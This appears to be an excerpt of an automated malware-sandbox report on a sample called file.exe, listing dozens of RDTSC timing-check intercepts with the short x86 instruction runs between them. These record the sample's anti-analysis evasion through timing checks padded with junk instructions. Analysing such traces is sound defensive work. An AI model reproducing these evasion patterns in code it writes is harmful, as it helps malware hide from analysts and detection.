                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240D3F second address: 1240D4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F04D4C82A46h 0x0000000a jo 00007F04D4C82A46h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240E82 second address: 1240E90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F04D4C79EAEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF528 second address: 11AF561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F04D4C82A46h 0x0000000a pop edx 0x0000000b pushad 0x0000000c jmp 00007F04D4C82A55h 0x00000011 jmp 00007F04D4C82A55h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF561 second address: 11AF566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF566 second address: 11AF56C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF56C second address: 11AF5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C79EB5h 0x00000009 popad 0x0000000a jg 00007F04D4C79EACh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF5A2 second address: 11AF5A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF5A6 second address: 11AF5B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F04D4C79EADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF5B9 second address: 11AF5C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF5C3 second address: 11AF5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1249B81 second address: 1249B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1249B85 second address: 1249B89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1249CD4 second address: 1249CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1249CD8 second address: 1249D18 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F04D4C79EA6h 0x00000008 jmp 00007F04D4C79EB7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jng 00007F04D4C79EA6h 0x00000016 pushad 0x00000017 popad 0x00000018 jns 00007F04D4C79EA6h 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 je 00007F04D4C79EACh 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124A3F9 second address: 124A407 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A4Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12508C9 second address: 12508D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1250A5E second address: 1250A62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1250A62 second address: 1250A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1250A68 second address: 1250A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1250A72 second address: 1250A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1250A76 second address: 1250A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1253468 second address: 12534A6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F04D4C79EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F04D4C79EB2h 0x00000010 jo 00007F04D4C79EA6h 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F04D4C79EB8h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF58E second address: 11AF5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125A356 second address: 125A35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125A35A second address: 125A360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125A360 second address: 125A38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jns 00007F04D4C79EB2h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007F04D4C79EB0h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125A38E second address: 125A3AF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F04D4C82A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F04D4C82A53h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125A3AF second address: 125A3B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125A4E4 second address: 125A4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007F04D4C82A61h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125A4F3 second address: 125A50C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C79EB5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125A50C second address: 125A522 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04D4C82A52h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125A522 second address: 125A542 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F04D4C79EB8h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125A542 second address: 125A546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125A819 second address: 125A81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F21B second address: 125F225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F04D4C82A46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F225 second address: 125F233 instructions: 0x00000000 rdtsc 0x00000002 je 00007F04D4C79EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F233 second address: 125F24E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F24E second address: 125F26E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F04D4C79EB3h 0x00000008 jc 00007F04D4C79EA6h 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F56B second address: 125F589 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F04D4C82A52h 0x00000008 jc 00007F04D4C82A46h 0x0000000e jo 00007F04D4C82A46h 0x00000014 jne 00007F04D4C82A4Eh 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F589 second address: 125F594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F594 second address: 125F5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F04D4C82A59h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F5B6 second address: 125F5BB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125FC27 second address: 125FC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12605A8 second address: 12605AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1261F68 second address: 1261F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1261F6C second address: 1261F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F04D4C79EB0h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1261F84 second address: 1261F9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04D4C82A4Ch 0x00000009 jc 00007F04D4C82A46h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126503A second address: 1265048 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F04D4C79EA8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1265048 second address: 126504C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126481A second address: 1264835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C79EB7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264835 second address: 126485B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F04D4C82A50h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F04D4C82A4Eh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12649A9 second address: 12649AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264DAB second address: 1264DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A850 second address: 126A869 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F04D4C79EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F04D4C79EABh 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A869 second address: 126A87C instructions: 0x00000000 rdtsc 0x00000002 js 00007F04D4C82A46h 0x00000008 jo 00007F04D4C82A46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A87C second address: 126A882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A882 second address: 126A8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C82A50h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A8A3 second address: 126A8B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jnl 00007F04D4C79EA6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A8B4 second address: 126A8C8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F04D4C82A4Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126AA4D second address: 126AA51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B360 second address: 126B366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B366 second address: 126B386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jns 00007F04D4C79EA6h 0x0000000c popad 0x0000000d jmp 00007F04D4C79EB3h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B386 second address: 126B3A6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F04D4C82A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F04D4C82A4Eh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B66B second address: 126B66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B66F second address: 126B68E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F04D4C82A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F04D4C82A55h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126BC6D second address: 126BC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F04D4C79EB4h 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126C268 second address: 126C26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126C26E second address: 126C272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126C272 second address: 126C276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12715AD second address: 12715B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12715B1 second address: 12715C1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F04D4C82A46h 0x00000008 ja 00007F04D4C82A46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270A2A second address: 1270A30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270A30 second address: 1270A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270A34 second address: 1270A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270C04 second address: 1270C09 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270D57 second address: 1270D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270D5B second address: 1270D62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270D62 second address: 1270D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1271175 second address: 127117D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127117D second address: 127118A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F04D4C79EA6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127118A second address: 127119C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04D4C82A4Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127119C second address: 12711D3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F04D4C79EB2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F04D4C79EB4h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jo 00007F04D4C79EACh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127130F second address: 127131A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280DE3 second address: 1280DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C79EB4h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F0B3 second address: 127F0BD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F212 second address: 127F217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F217 second address: 127F234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F04D4C82A58h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F234 second address: 127F23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F4F0 second address: 127F515 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A57h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F04D4C82A48h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F639 second address: 127F63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F63F second address: 127F643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F643 second address: 127F64E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F64E second address: 127F654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F654 second address: 127F67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jno 00007F04D4C79EA6h 0x0000000e jmp 00007F04D4C79EB5h 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F67B second address: 127F682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F682 second address: 127F6A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EB9h 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F04D4C79EA6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F802 second address: 127F80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F80B second address: 127F837 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EAEh 0x00000007 pushad 0x00000008 jmp 00007F04D4C79EB9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F837 second address: 127F83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127FDBC second address: 127FDD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EB1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EBB7 second address: 127EBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EBBB second address: 127EBE0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F04D4C79EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F04D4C79EB5h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EBE0 second address: 127EBE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EBE6 second address: 127EBEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
